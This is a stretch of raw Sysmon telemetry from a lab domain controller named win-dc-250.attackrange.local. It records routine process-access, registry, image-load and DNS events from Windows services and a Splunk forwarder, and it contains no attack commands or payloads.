13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-43B5-6000-0201-000000009A01}3128C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-43B5-6000-0201-000000009A01}3128C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.225{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.225{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.178{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-43B5-6000-0201-000000009A01}3128C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+21082|c:\windows\system32\usocore.dll+158d4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:30.084{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-43B5-6000-0201-000000009A01}3128C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:14:36.571{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0x3507c259) 10341000x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:58.814{08A6967A-4288-6000-1100-000000009A01}11921876C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:58.814{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:58.814{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:14:58.782{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:14:58.782{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:14:58.782{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 734700x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:58.751{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\System32\dfsrs.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:58.313{08A6967A-4298-6000-3300-000000009A01}2812win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.929{08A6967A-43E3-6000-0501-000000009A01}22001472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E3-6000-0501-000000009A01}2200C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 